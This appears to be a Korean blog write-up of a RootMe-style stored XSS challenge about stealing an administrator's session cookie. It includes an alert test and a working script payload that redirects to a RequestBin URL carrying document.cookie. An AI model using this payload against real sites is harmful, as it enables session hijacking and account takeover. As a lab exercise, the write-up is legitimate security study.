반응형
Statement
문제
Steal the administrator session cookie and use it to validate this chall.
관리자 쿠키 세션을 탈취하자
처음 화면은 게시판 글쓰기 화면을 볼 수 있다.
아무거나 한번 입력해보면 하단에 글이 하나씩 저장되는걸 확인할 수 있으며
Input 태그에 XSS가 가능한지 테스트 해보자.
<script>alert('test')</script>
이상없이 XSS가 되는걸 확인할 수 있다.
XSS의 개념에 대해서는 아래 링크에서 확인해보자
> [XSS] 크로스사이트스크립팅 [WEB]
개인 서버가 없으므로 공부용으로 요긴하게 쓸 수 있는 RequestBin을 사용 해 쿠키 값을 전달 받아 보자.
게시판 글에 아래와 같이 스크립트를 작성해보자
<script>document.location.href="http://lfoihmd56qs5zzgs.b.requ~~~/?cookie="+document.cookie</script>
하이퍼링크를 통해 서버를 호출하면서 쿠키 값을 같이 전달하는 스크립트
도착한 스크립트를 보면 cookie값으로 ADMIN_COOKIE를 확인할 수 있다.
해당 값으로 FLAG를 입력하자.
반응형
'IT > CTF' 카테고리의 다른 글
| [RootMe] HTML - Source code [WEB/Server] (0) | 2022.07.02 |
|---|---|
| [2020angstromctf] The Magic Word - 웹해킹 / 자바스크립트 (0) | 2022.07.01 |
| [RootMe] Javascript - Obfuscation 3 [WEB/CLIENT] (0) | 2022.06.30 |
| [RootMe] Javascript - Webpack [WEB/CLIENT] (0) | 2022.06.28 |
| [RootMe] Javascript - Native code [WEB/CLIENT] (0) | 2022.06.28 |
